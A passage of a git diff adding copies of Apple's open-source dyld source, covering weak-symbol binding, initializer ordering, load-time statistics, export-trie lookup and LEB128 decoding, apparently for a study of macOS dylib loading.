weak binding adding unloadable placeholder %s to map\n", nameToCoalesce); + } + } + } + if ( context.verboseWeakBind ) + dyld::log("dyld: adjusting uses of %s in %s to use definition from %s\n", nameToCoalesce, coalIterator.image->getPath(), targetImage->getPath()); + } + } + imageBeingFixedUp->setWeakSymbolsBound(imageIndexes[i]); + } + } + else +#endif // TARGET_OS_OSX + { + // make symbol iterators for each + ImageLoader::CoalIterator iterators[count]; + ImageLoader::CoalIterator* sortedIts[count]; + for(int i=0; i < count; ++i) { + imagesNeedingCoalescing[i]->initializeCoalIterator(iterators[i], i, imageIndexes[i]); + sortedIts[i] = &iterators[i]; + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind load order %d/%d for %s\n", i, count, imagesNeedingCoalescing[i]->getIndexedPath(imageIndexes[i])); + } + + // walk all symbols keeping iterators in sync by + // only ever incrementing the iterator with the lowest symbol + int doneCount = 0; + while ( doneCount != count ) { + //for(int i=0; i < count; ++i) + // dyld::log("sym[%d]=%s ", sortedIts[i]->loadOrder, sortedIts[i]->symbolName); + //dyld::log("\n"); + // increment iterator with lowest symbol + if ( sortedIts[0]->image->incrementCoalIterator(*sortedIts[0]) ) + ++doneCount; + // re-sort iterators + for(int i=1; i < count; ++i) { + int result = strcmp(sortedIts[i-1]->symbolName, sortedIts[i]->symbolName); + if ( result == 0 ) + sortedIts[i-1]->symbolMatches = true; + if ( result > 0 ) { + // new one is bigger then next, so swap + ImageLoader::CoalIterator* temp = sortedIts[i-1]; + sortedIts[i-1] = sortedIts[i]; + sortedIts[i] = temp; + } + if ( result < 0 ) + break; + } + // process all matching symbols just before incrementing the lowest one that matches + if ( sortedIts[0]->symbolMatches && !sortedIts[0]->done ) { + const char* nameToCoalesce = sortedIts[0]->symbolName; + // pick first symbol in load order (and non-weak overrides weak) + uintptr_t targetAddr = 0; + ImageLoader* targetImage = NULL; + unsigned targetImageIndex = 0; + for(int i=0; i < count; ++i) { + if ( strcmp(iterators[i].symbolName, nameToCoalesce) == 0 ) { + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind, found %s weak=%d in %s \n", nameToCoalesce, iterators[i].weakSymbol, iterators[i].image->getIndexedPath((unsigned)iterators[i].imageIndex)); + if ( iterators[i].weakSymbol ) { + if ( targetAddr == 0 ) { + targetAddr = iterators[i].image->getAddressCoalIterator(iterators[i], context); + if ( targetAddr != 0 ) { + targetImage = iterators[i].image; + targetImageIndex = (unsigned)iterators[i].imageIndex; + } + } + } + else { + targetAddr = iterators[i].image->getAddressCoalIterator(iterators[i], context); + if ( targetAddr != 0 ) { + targetImage = iterators[i].image; + targetImageIndex = (unsigned)iterators[i].imageIndex; + // strong implementation found, stop searching + break; + } + } + } + } + // tell each to bind to this symbol (unless already bound) + if ( targetAddr != 0 ) { + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak binding all uses of %s to copy from %s\n", + nameToCoalesce, targetImage->getIndexedShortName(targetImageIndex)); + } + for(int i=0; i < count; ++i) { + if ( strcmp(iterators[i].symbolName, nameToCoalesce) == 0 ) { + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak bind, setting all uses of %s in %s to 0x%lX from %s\n", + nameToCoalesce, iterators[i].image->getIndexedShortName((unsigned)iterators[i].imageIndex), + targetAddr, targetImage->getIndexedShortName(targetImageIndex)); + } + if ( ! iterators[i].image->weakSymbolsBound(imageIndexes[i]) ) { + if ( iterators[i].image->inSharedCache() ) + patcher.makeWriteable(); + iterators[i].image->updateUsesCoalIterator(iterators[i], targetAddr, targetImage, targetImageIndex, context); + } + iterators[i].symbolMatches = false; + } + } + if (targetImage->neverUnload()) { + // Add never unload defs to the map for next time + context.weakDefMap.insert({ nameToCoalesce, { targetImage, targetAddr } }); + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak binding adding %s to map\n", + nameToCoalesce); + } + } + } + + } + } + + for (int i=0; i < count; ++i) { + if ( imagesNeedingCoalescing[i]->weakSymbolsBound(imageIndexes[i]) ) + continue; // skip images already processed + + if ( imagesNeedingCoalescing[i]->usesChainedFixups() ) { + // during binding of references to weak-def symbols, the dyld cache was patched + // but if main executable has non-weak override of operator new or delete it needs is handled here + for (const char* weakSymbolName : sTreatAsWeak) { + const ImageLoader* dummy; + imagesNeedingCoalescing[i]->resolveWeak(context, weakSymbolName, true, false, &dummy, patcher); + } + } +#if __arm64e__ + else { + // support traditional arm64 app on an arm64e device + // look for weak def symbols in this image which may override the cache + ImageLoader::CoalIterator coaler; + imagesNeedingCoalescing[i]->initializeCoalIterator(coaler, i, 0); + imagesNeedingCoalescing[i]->incrementCoalIterator(coaler); + while ( !coaler.done ) { + const ImageLoader* dummy; + // a side effect of resolveWeak() is to patch cache + imagesNeedingCoalescing[i]->resolveWeak(context, coaler.symbolName, true, false, &dummy, patcher); + imagesNeedingCoalescing[i]->incrementCoalIterator(coaler); + } + } +#endif + } + + // mark all as having all weak symbols bound + for(int i=0; i < count; ++i) { + imagesNeedingCoalescing[i]->setWeakSymbolsBound(imageIndexes[i]); + } + } + } + + uint64_t t2 = mach_absolute_time(); + fgTotalWeakBindTime += t2 - t1; + + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind end\n"); +} + + +void ImageLoader::weakBindOld(const LinkContext& context) +{ + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind start:\n"); + uint64_t t1 = mach_absolute_time(); + // get set of ImageLoaders that participate in coalecsing + ImageLoader* imagesNeedingCoalescing[fgImagesRequiringCoalescing]; + unsigned imageIndexes[fgImagesRequiringCoalescing]; + int count = context.getCoalescedImages(imagesNeedingCoalescing, imageIndexes); + + // count how many have not already had weakbinding done + int countNotYetWeakBound = 0; + int countOfImagesWithWeakDefinitionsNotInSharedCache = 0; + for(int i=0; i < count; ++i) { + if ( ! imagesNeedingCoalescing[i]->weakSymbolsBound(imageIndexes[i]) ) + ++countNotYetWeakBound; + if ( ! imagesNeedingCoalescing[i]->inSharedCache() ) + ++countOfImagesWithWeakDefinitionsNotInSharedCache; + } + + // don't need to do any coalescing if only one image has overrides, or all have already been done + if ( (countOfImagesWithWeakDefinitionsNotInSharedCache > 0) && (countNotYetWeakBound > 0) ) { + // We might have to patch the shared cache __DATA_CONST. In that case, we'll create just a single + // patcher when needed. + DyldSharedCache::DataConstLazyScopedWriter patcher(context.dyldCache, mach_task_self(), context.verboseMapping ? &dyld::log : nullptr); + +#if TARGET_OS_OSX + // only do alternate algorithm for dlopen(). Use traditional algorithm for launch + if ( !context.linkingMainExecutable ) { + // for all images that need weak binding + for (int i=0; i < count; ++i) { + ImageLoader* imageBeingFixedUp = imagesNeedingCoalescing[i]; + if ( imageBeingFixedUp->weakSymbolsBound(imageIndexes[i]) ) + continue; // weak binding already completed + bool imageBeingFixedUpInCache = imageBeingFixedUp->inSharedCache(); + + if ( context.verboseWeakBind ) + dyld::log("dyld: checking for weak symbols in %s\n", imageBeingFixedUp->getPath()); + // for all symbols that need weak binding in this image + ImageLoader::CoalIterator coalIterator; + imageBeingFixedUp->initializeCoalIterator(coalIterator, i, imageIndexes[i]); + while ( !imageBeingFixedUp->incrementCoalIterator(coalIterator) ) { + const char* nameToCoalesce = coalIterator.symbolName; + uintptr_t targetAddr = 0; + const ImageLoader* targetImage; + // scan all images looking for definition to use + for (int j=0; j < count; ++j) { + const ImageLoader* anImage = imagesNeedingCoalescing[j]; + bool anImageInCache = anImage->inSharedCache(); + // Don't look at images in dyld cache because cache is + // already coalesced. Only images outside cache can potentially override something in cache. + if ( anImageInCache && imageBeingFixedUpInCache ) + continue; + + //dyld::log("looking for %s in %s\n", nameToCoalesce, anImage->getPath()); + const ImageLoader* foundIn; + const Symbol* sym = anImage->findExportedSymbol(nameToCoalesce, false, &foundIn); + if ( sym != NULL ) { + if ( (foundIn->getExportedSymbolInfo(sym) & ImageLoader::kWeakDefinition) == 0 ) { + // found non-weak def, use it and stop looking + targetAddr = foundIn->getExportedSymbolAddress(sym, context); + targetImage = foundIn; + if ( context.verboseWeakBind ) + dyld::log("dyld: found strong %s at 0x%lX in %s\n", nameToCoalesce, targetAddr, foundIn->getPath()); + break; + } + else { + // found weak-def, only use if no weak found yet + if ( targetAddr == 0 ) { + targetAddr = foundIn->getExportedSymbolAddress(sym, context); + targetImage = foundIn; + if ( context.verboseWeakBind ) + dyld::log("dyld: found weak %s at 0x%lX in %s\n", nameToCoalesce, targetAddr, foundIn->getPath()); + } + } + } + } + if ( (targetAddr != 0) && (coalIterator.image != targetImage) ) { + if ( coalIterator.image->inSharedCache() ) + patcher.makeWriteable(); + coalIterator.image->updateUsesCoalIterator(coalIterator, targetAddr, (ImageLoader*)targetImage, 0, context); + if ( context.verboseWeakBind ) + dyld::log("dyld: adjusting uses of %s in %s to use definition from %s\n", nameToCoalesce, coalIterator.image->getPath(), targetImage->getPath()); + } + } + imageBeingFixedUp->setWeakSymbolsBound(imageIndexes[i]); + } + } + else +#endif // TARGET_OS_OSX + { + // make symbol iterators for each + ImageLoader::CoalIterator iterators[count]; + ImageLoader::CoalIterator* sortedIts[count]; + for(int i=0; i < count; ++i) { + imagesNeedingCoalescing[i]->initializeCoalIterator(iterators[i], i, imageIndexes[i]); + sortedIts[i] = &iterators[i]; + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind load order %d/%d for %s\n", i, count, imagesNeedingCoalescing[i]->getIndexedPath(imageIndexes[i])); + } + + // walk all symbols keeping iterators in sync by + // only ever incrementing the iterator with the lowest symbol + int doneCount = 0; + while ( doneCount != count ) { + //for(int i=0; i < count; ++i) + // dyld::log("sym[%d]=%s ", sortedIts[i]->loadOrder, sortedIts[i]->symbolName); + //dyld::log("\n"); + // increment iterator with lowest symbol + if ( sortedIts[0]->image->incrementCoalIterator(*sortedIts[0]) ) + ++doneCount; + // re-sort iterators + for(int i=1; i < count; ++i) { + int result = strcmp(sortedIts[i-1]->symbolName, sortedIts[i]->symbolName); + if ( result == 0 ) + sortedIts[i-1]->symbolMatches = true; + if ( result > 0 ) { + // new one is bigger then next, so swap + ImageLoader::CoalIterator* temp = sortedIts[i-1]; + sortedIts[i-1] = sortedIts[i]; + sortedIts[i] = temp; + } + if ( result < 0 ) + break; + } + // process all matching symbols just before incrementing the lowest one that matches + if ( sortedIts[0]->symbolMatches && !sortedIts[0]->done ) { + const char* nameToCoalesce = sortedIts[0]->symbolName; + // pick first symbol in load order (and non-weak overrides weak) + uintptr_t targetAddr = 0; + ImageLoader* targetImage = NULL; + unsigned targetImageIndex = 0; + for(int i=0; i < count; ++i) { + if ( strcmp(iterators[i].symbolName, nameToCoalesce) == 0 ) { + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind, found %s weak=%d in %s \n", nameToCoalesce, iterators[i].weakSymbol, iterators[i].image->getIndexedPath((unsigned)iterators[i].imageIndex)); + if ( iterators[i].weakSymbol ) { + if ( targetAddr == 0 ) { + targetAddr = iterators[i].image->getAddressCoalIterator(iterators[i], context); + if ( targetAddr != 0 ) { + targetImage = iterators[i].image; + targetImageIndex = (unsigned)iterators[i].imageIndex; + } + } + } + else { + targetAddr = iterators[i].image->getAddressCoalIterator(iterators[i], context); + if ( targetAddr != 0 ) { + targetImage = iterators[i].image; + targetImageIndex = (unsigned)iterators[i].imageIndex; + // strong implementation found, stop searching + break; + } + } + } + } + // tell each to bind to this symbol (unless already bound) + if ( targetAddr != 0 ) { + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak binding all uses of %s to copy from %s\n", + nameToCoalesce, targetImage->getIndexedShortName(targetImageIndex)); + } + for(int i=0; i < count; ++i) { + if ( strcmp(iterators[i].symbolName, nameToCoalesce) == 0 ) { + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak bind, setting all uses of %s in %s to 0x%lX from %s\n", + nameToCoalesce, iterators[i].image->getIndexedShortName((unsigned)iterators[i].imageIndex), + targetAddr, targetImage->getIndexedShortName(targetImageIndex)); + } + if ( ! iterators[i].image->weakSymbolsBound(imageIndexes[i]) ) { + if ( iterators[i].image->inSharedCache() ) + patcher.makeWriteable(); + iterators[i].image->updateUsesCoalIterator(iterators[i], targetAddr, targetImage, targetImageIndex, context); + } + iterators[i].symbolMatches = false; + } + } + } + + } + } + + for (int i=0; i < count; ++i) { + if ( imagesNeedingCoalescing[i]->weakSymbolsBound(imageIndexes[i]) ) + continue; // skip images already processed + + if ( imagesNeedingCoalescing[i]->usesChainedFixups() ) { + // during binding of references to weak-def symbols, the dyld cache was patched + // but if main executable has non-weak override of operator new or delete it needs is handled here + for (const char* weakSymbolName : sTreatAsWeak) { + const ImageLoader* dummy; + imagesNeedingCoalescing[i]->resolveWeak(context, weakSymbolName, true, false, &dummy, patcher); + } + } +#if __arm64e__ + else { + // support traditional arm64 app on an arm64e device + // look for weak def symbols in this image which may override the cache + patcher.makeWriteable(); + ImageLoader::CoalIterator coaler; + imagesNeedingCoalescing[i]->initializeCoalIterator(coaler, i, 0); + imagesNeedingCoalescing[i]->incrementCoalIterator(coaler); + while ( !coaler.done ) { + const ImageLoader* dummy; + // a side effect of resolveWeak() is to patch cache + imagesNeedingCoalescing[i]->resolveWeak(context, coaler.symbolName, true, false, &dummy, patcher); + imagesNeedingCoalescing[i]->incrementCoalIterator(coaler); + } + } +#endif + } + + // mark all as having all weak symbols bound + for(int i=0; i < count; ++i) { + imagesNeedingCoalescing[i]->setWeakSymbolsBound(imageIndexes[i]); + } + } + } + + uint64_t t2 = mach_absolute_time(); + fgTotalWeakBindTime += t2 - t1; + + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind end\n"); +} + + + +void ImageLoader::recursiveGetDOFSections(const LinkContext& context, std::vector& dofs) +{ + if ( ! fRegisteredDOF ) { + // break cycles + fRegisteredDOF = true; + + // gather lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->recursiveGetDOFSections(context, dofs); + } + this->doGetDOFSections(context, dofs); + } +} + +void ImageLoader::setNeverUnloadRecursive() { + if ( ! fNeverUnload ) { + // break cycles + fNeverUnload = true; + + // gather lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->setNeverUnloadRecursive(); + } + } +} + +void ImageLoader::recursiveSpinLock(recursive_lock& rlock) +{ + // try to set image's ivar fInitializerRecursiveLock to point to this lock_info + // keep trying until success (spin) +#pragma clang diagnostic push +#pragma clang diagnostic ignored "-Wdeprecated-declarations" + while ( ! OSAtomicCompareAndSwapPtrBarrier(NULL, &rlock, (void**)&fInitializerRecursiveLock) ) { + // if fInitializerRecursiveLock already points to a different lock_info, if it is for + // the same thread we are on, the increment the lock count, otherwise continue to spin + if ( (fInitializerRecursiveLock != NULL) && (fInitializerRecursiveLock->thread == rlock.thread) ) + break; + } +#pragma clang diagnostic pop + ++(fInitializerRecursiveLock->count); +} + +void ImageLoader::recursiveSpinUnLock() +{ + if ( --(fInitializerRecursiveLock->count) == 0 ) + fInitializerRecursiveLock = NULL; +} + +void ImageLoader::InitializerTimingList::addTime(const char* name, uint64_t time) +{ + for (int i=0; i < count; ++i) { + if ( strcmp(images[i].shortName, name) == 0 ) { + images[i].initTime += time; + return; + } + } + images[count].initTime = time; + images[count].shortName = name; + ++count; +} + +void ImageLoader::recursiveInitialization(const LinkContext& context, mach_port_t this_thread, const char* pathToInitialize, + InitializerTimingList& timingInfo, UninitedUpwards& uninitUps) +{ + recursive_lock lock_info(this_thread); + recursiveSpinLock(lock_info); + + if ( fState < dyld_image_state_dependents_initialized-1 ) { + uint8_t oldState = fState; + // break cycles + fState = dyld_image_state_dependents_initialized-1; + try { + // initialize lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + // don't try to initialize stuff "above" me yet + if ( libIsUpward(i) ) { + uninitUps.imagesAndPaths[uninitUps.count] = { dependentImage, libPath(i) }; + uninitUps.count++; + } + else if ( dependentImage->fDepth >= fDepth ) { + dependentImage->recursiveInitialization(context, this_thread, libPath(i), timingInfo, uninitUps); + } + } + } + + // record termination order + if ( this->needsTermination() ) + context.terminationRecorder(this); + + // let objc know we are about to initialize this image + uint64_t t1 = mach_absolute_time(); + fState = dyld_image_state_dependents_initialized; + oldState = fState; + context.notifySingle(dyld_image_state_dependents_initialized, this, &timingInfo); + + // initialize this image + bool hasInitializers = this->doInitialization(context); + + // let anyone know we finished initializing this image + fState = dyld_image_state_initialized; + oldState = fState; + context.notifySingle(dyld_image_state_initialized, this, NULL); + + if ( hasInitializers ) { + uint64_t t2 = mach_absolute_time(); + timingInfo.addTime(this->getShortName(), t2-t1); + } + } + catch (const char* msg) { + // this image is not initialized + fState = oldState; + recursiveSpinUnLock(); + throw; + } + } + + recursiveSpinUnLock(); +} + + +static void printTime(const char* msg, uint64_t partTime, uint64_t totalTime) +{ + static uint64_t sUnitsPerSecond = 0; + if ( sUnitsPerSecond == 0 ) { + struct mach_timebase_info timeBaseInfo; + if ( mach_timebase_info(&timeBaseInfo) != KERN_SUCCESS ) + return; + sUnitsPerSecond = 1000000000ULL * timeBaseInfo.denom / timeBaseInfo.numer; + } + if ( partTime < sUnitsPerSecond ) { + uint32_t milliSecondsTimesHundred = (uint32_t)((partTime*100000)/sUnitsPerSecond); + uint32_t milliSeconds = (uint32_t)(milliSecondsTimesHundred/100); + uint32_t percentTimesTen = (uint32_t)((partTime*1000)/totalTime); + uint32_t percent = percentTimesTen/10; + if ( milliSeconds >= 100 ) + dyld::log("%s: %u.%02u milliseconds (%u.%u%%)\n", msg, milliSeconds, milliSecondsTimesHundred-milliSeconds*100, percent, percentTimesTen-percent*10); + else if ( milliSeconds >= 10 ) + dyld::log("%s: %u.%02u milliseconds (%u.%u%%)\n", msg, milliSeconds, milliSecondsTimesHundred-milliSeconds*100, percent, percentTimesTen-percent*10); + else + dyld::log("%s: %u.%02u milliseconds (%u.%u%%)\n", msg, milliSeconds, milliSecondsTimesHundred-milliSeconds*100, percent, percentTimesTen-percent*10); + } + else { + uint32_t secondsTimeTen = (uint32_t)((partTime*10)/sUnitsPerSecond); + uint32_t seconds = secondsTimeTen/10; + uint32_t percentTimesTen = (uint32_t)((partTime*1000)/totalTime); + uint32_t percent = percentTimesTen/10; + dyld::log("%s: %u.%u seconds (%u.%u%%)\n", msg, seconds, secondsTimeTen-seconds*10, percent, percentTimesTen-percent*10); + } +} + +static char* commatize(uint64_t in, char* out) +{ + uint64_t div10 = in / 10; + uint8_t delta = in - div10*10; + char* s = &out[32]; + int digitCount = 1; + *s = '\0'; + *(--s) = '0' + delta; + in = div10; + while ( in != 0 ) { + if ( (digitCount % 3) == 0 ) + *(--s) = ','; + div10 = in / 10; + delta = in - div10*10; + *(--s) = '0' + delta; + in = div10; + ++digitCount; + } + return s; +} + + +void ImageLoader::printStatistics(unsigned int imageCount, const InitializerTimingList& timingInfo) +{ + uint64_t totalTime = fgTotalLoadLibrariesTime + fgTotalRebaseTime + fgTotalBindTime + fgTotalWeakBindTime + fgTotalDOF + fgTotalInitTime; + + uint64_t totalDyldTime = totalTime - fgTotalDebuggerPausedTime - fgTotalRebindCacheTime; + printTime("Total pre-main time", totalDyldTime, totalDyldTime); + printTime(" dylib loading time", fgTotalLoadLibrariesTime-fgTotalDebuggerPausedTime, totalDyldTime); + printTime(" rebase/binding time", fgTotalRebaseTime+fgTotalBindTime+fgTotalWeakBindTime-fgTotalRebindCacheTime, totalDyldTime); + printTime(" ObjC setup time", fgTotalObjCSetupTime, totalDyldTime); + printTime(" initializer time", fgTotalInitTime-fgTotalObjCSetupTime, totalDyldTime); + dyld::log(" slowest intializers :\n"); + for (uintptr_t i=0; i < timingInfo.count; ++i) { + uint64_t t = timingInfo.images[i].initTime; + if ( t*50 < totalDyldTime ) + continue; + dyld::log("%30s ", timingInfo.images[i].shortName); + if ( strncmp(timingInfo.images[i].shortName, "libSystem.", 10) == 0 ) + t -= fgTotalObjCSetupTime; + printTime("", t, totalDyldTime); + } + dyld::log("\n"); +} + +void ImageLoader::printStatisticsDetails(unsigned int imageCount, const InitializerTimingList& timingInfo) +{ + uint64_t totalTime = fgTotalLoadLibrariesTime + fgTotalRebaseTime + fgTotalBindTime + fgTotalWeakBindTime + fgTotalDOF + fgTotalInitTime; + char commaNum1[40]; + char commaNum2[40]; + + printTime(" total time", totalTime, totalTime); + dyld::log(" total images loaded: %d (%u from dyld shared cache)\n", imageCount, fgImagesUsedFromSharedCache); + dyld::log(" total segments mapped: %u, into %llu pages\n", fgTotalSegmentsMapped, fgTotalBytesMapped/4096); + printTime(" total images loading time", fgTotalLoadLibrariesTime, totalTime); + printTime(" total load time in ObjC", fgTotalObjCSetupTime, totalTime); + printTime(" total debugger pause time", fgTotalDebuggerPausedTime, totalTime); + printTime(" total dtrace DOF registration time", fgTotalDOF, totalTime); + dyld::log(" total rebase fixups: %s\n", commatize(fgTotalRebaseFixups, commaNum1)); + printTime(" total rebase fixups time", fgTotalRebaseTime, totalTime); + dyld::log(" total binding fixups: %s\n", commatize(fgTotalBindFixups, commaNum1)); + if ( fgTotalBindSymbolsResolved != 0 ) { + uint32_t avgTimesTen = (fgTotalBindImageSearches * 10) / fgTotalBindSymbolsResolved; + uint32_t avgInt = fgTotalBindImageSearches / fgTotalBindSymbolsResolved; + uint32_t avgTenths = avgTimesTen - (avgInt*10); + dyld::log("total binding symbol lookups: %s, average images searched per symbol: %u.%u\n", + commatize(fgTotalBindSymbolsResolved, commaNum1), avgInt, avgTenths); + } + printTime(" total binding fixups time", fgTotalBindTime, totalTime); + printTime(" total weak binding fixups time", fgTotalWeakBindTime, totalTime); + printTime(" total redo shared cached bindings time", fgTotalRebindCacheTime, totalTime); + dyld::log(" total bindings lazily fixed up: %s of %s\n", commatize(fgTotalLazyBindFixups, commaNum1), commatize(fgTotalPossibleLazyBindFixups, commaNum2)); + printTime(" total time in initializers and ObjC +load", fgTotalInitTime-fgTotalObjCSetupTime, totalTime); + for (uintptr_t i=0; i < timingInfo.count; ++i) { + uint64_t t = timingInfo.images[i].initTime; + if ( t*1000 < totalTime ) + continue; + dyld::log("%42s ", timingInfo.images[i].shortName); + if ( strncmp(timingInfo.images[i].shortName, "libSystem.", 10) == 0 ) + t -= fgTotalObjCSetupTime; + printTime("", t, totalTime); + } + +} + + +// +// copy path and add suffix to result +// +// /path/foo.dylib _debug => /path/foo_debug.dylib +// foo.dylib _debug => foo_debug.dylib +// foo _debug => foo_debug +// /path/bar _debug => /path/bar_debug +// /path/bar.A.dylib _debug => /path/bar.A_debug.dylib +// +void ImageLoader::addSuffix(const char* path, const char* suffix, char* result) +{ + strcpy(result, path); + + char* start = strrchr(result, '/'); + if ( start != NULL ) + start++; + else + start = result; + + char* dot = strrchr(start, '.'); + if ( dot != NULL ) { + strcpy(dot, suffix); + strcat(&dot[strlen(suffix)], &path[dot-result]); + } + else { + strcat(result, suffix); + } +} + + +// +// This function is the hotspot of symbol lookup. It was pulled out of findExportedSymbol() +// to enable it to be re-written in assembler if needed. +// +const uint8_t* ImageLoader::trieWalk(const uint8_t* start, const uint8_t* end, const char* s) +{ + //dyld::log("trieWalk(%p, %p, %s)\n", start, end, s); + ++fgSymbolTrieSearchs; + const uint8_t* p = start; + while ( p != NULL ) { + uintptr_t terminalSize = *p++; + if ( terminalSize > 127 ) { + // except for re-export-with-rename, all terminal sizes fit in one byte + --p; + terminalSize = read_uleb128(p, end); + } + if ( (*s == '\0') && (terminalSize != 0) ) { + //dyld::log("trieWalk(%p) returning %p\n", start, p); + return p; + } + const uint8_t* children = p + terminalSize; + if ( children > end ) { + dyld::log("trieWalk() malformed trie node, terminalSize=0x%lx extends past end of trie\n", terminalSize); + return NULL; + } + //dyld::log("trieWalk(%p) sym=%s, terminalSize=%lu, children=%p\n", start, s, terminalSize, children); + uint8_t childrenRemaining = *children++; + p = children; + uintptr_t nodeOffset = 0; + for (; childrenRemaining > 0; --childrenRemaining) { + const char* ss = s; + //dyld::log("trieWalk(%p) child str=%s\n", start, (char*)p); + bool wrongEdge = false; + // scan whole edge to get to next edge + // if edge is longer than target symbol name, don't read past end of symbol name + char c = *p; + while ( c != '\0' ) { + if ( !wrongEdge ) { + if ( c != *ss ) + wrongEdge = true; + ++ss; + } + ++p; + c = *p; + } + if ( wrongEdge ) { + // advance to next child + ++p; // skip over zero terminator + // skip over uleb128 until last byte is found + while ( (*p & 0x80) != 0 ) + ++p; + ++p; // skip over last byte of uleb128 + if ( p > end ) { + dyld::log("trieWalk() malformed trie node, child node extends past end of trie\n"); + return NULL; + } + } + else { + // the symbol so far matches this edge (child) + // so advance to the child's node + ++p; + nodeOffset = read_uleb128(p, end); + if ( (nodeOffset == 0) || ( &start[nodeOffset] > end) ) { + dyld::log("trieWalk() malformed trie child, nodeOffset=0x%lx out of range\n", nodeOffset); + return NULL; + } + s = ss; + //dyld::log("trieWalk() found matching edge advancing to node 0x%lx\n", nodeOffset); + break; + } + } + if ( nodeOffset != 0 ) + p = &start[nodeOffset]; + else + p = NULL; + } + //dyld::log("trieWalk(%p) return NULL\n", start); + return NULL; +} + + + +uintptr_t ImageLoader::read_uleb128(const uint8_t*& p, const uint8_t* end) +{ + uint64_t result = 0; + int bit = 0; + do { + if (p == end) + dyld::throwf("malformed uleb128"); + + uint64_t slice = *p & 0x7f; + + if (bit > 63) + dyld::throwf("uleb128 too big for uint64, bit=%d, result=0x%0llX", bit, result); + else { + result |= (slice << bit); + bit += 7; + } + } while (*p++ & 0x80); + return (uintptr_t)result; +} + + +intptr_t ImageLoader::read_sleb128(const uint8_t*& p, const uint8_t* end) +{ + int64_t result = 0; + int bit = 0; + uint8_t byte; + do { + if (p == end) + throw "malformed sleb128"; + byte = *p++; + result |= (((int64_t)(byte & 0x7f)) << bit); + bit += 7; + } while (byte & 0x80); + // sign extend negative numbers + if ( ((byte & 0x40) != 0) && (bit < 64) ) + result |= (~0ULL) << bit; + return (intptr_t)result; +} + +void ImageLoader::forEachReExportDependent( void (^callback)(const ImageLoader*, bool& stop)) const +{ + bool stop = false; + for (unsigned int i=0; i < libraryCount(); ++i) { + if ( libReExported(i) ) { + if ( ImageLoader* dependentImage = libImage(i) ) { + callback(dependentImage, stop); + } + } + if (stop) + break; + } +} + + +VECTOR_NEVER_DESTRUCTED_IMPL(ImageLoader::InterposeTuple); +VECTOR_NEVER_DESTRUCTED_IMPL(ImagePair); + + diff --git a/IV. Dylibs/macos/Loader.cpp b/IV. Dylibs/macos/Loader.cpp new file mode 100644 index 0000000..7a82aa9 --- /dev/null +++ b/IV. Dylibs/macos/Loader.cpp @@ -0,0 +1,3250 @@ +// Source (dyld-1125.5) : https://github.com/apple-oss-distributions/dyld/blob/main/dyld/Loader.cpp +/* + * Copyright (c) 2019 Apple Inc. All rights reserved. + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#include +#if !TARGET_OS_EXCLAVEKIT + #include + #include + #include + #include + #include + #include +#endif + +#include +#include + +#include "Defines.h" +#include "MachOAnalyzer.h" +#include "Loader.h" +#include "JustInTimeLoader.h" +#include "PrebuiltLoader.h" +#include "PremappedLoader.h" +#include "DyldRuntimeState.h" +#include "DyldProcessConfig.h" +#include "StringUtils.h" +#if BUILDING_DYLD && SUPPORT_ROSETTA + #include "RosettaSupport.h" +#endif +#include "Tracing.h" +#include "Utils.h" + +#ifndef VM_PROT_TPRO +#define VM_PROT_TPRO 0x200 +#endif + +#if !TARGET_OS_EXCLAVEKIT +#if __has_include() + #include + // this #define can be removed when rdar://92861504 is fixed + #ifndef MWL_MAX_REGION_COUNT + #define MWL_MAX_REGION_COUNT 5 + #endif +#else + struct mwl_region { + int mwlr_fd; /* fd of file file to over map */ + vm_prot_t mwlr_protections;/* protections for new overmapping */ + off_t mwlr_file_offset;/* offset in file of start of mapping */ + mach_vm_address_t mwlr_address; /* start address of existing region */ + mach_vm_size_t mwlr_size; /* size of existing region */ + }; + + #define MWL_INFO_VERS 7 + struct mwl_info_hdr { + uint32_t mwli_version; /* version of info blob, currently 7 */ + uint16_t mwli_page_size; /* 0x1000 or 0x4000 (for sanity checking) */ + uint16_t mwli_pointer_format; /* DYLD_CHAINED_PTR_* value */ + uint32_t mwli_binds_offset; /* offset within this blob of bind pointers table */ + uint32_t mwli_binds_count; /* number of pointers in bind pointers table (for range checks) */ + uint32_t mwli_chains_offset; /* offset within this blob of dyld_chained_starts_in_image */ + uint32_t mwli_chains_size; /* size of dyld_chained_starts_in_image */ + uint64_t mwli_slide; /* slide to add to rebased pointers */ + uint64_t mwli_image_address; /* add this to rebase offsets includes any slide */ + /* followed by the binds pointers and dyld_chained_starts_in_image */ + }; + #define MWL_MAX_REGION_COUNT 5 + extern int __map_with_linking_np(const struct mwl_region regions[], uint32_t regionCount, const struct mwl_info_hdr* blob, uint32_t blobSize); +#endif +#endif // !TARGET_OS_EXCLAVEKIT + +extern struct mach_header __dso_handle; + +// If a root is used that overrides a dylib in the dyld cache, dyld patches all uses of the 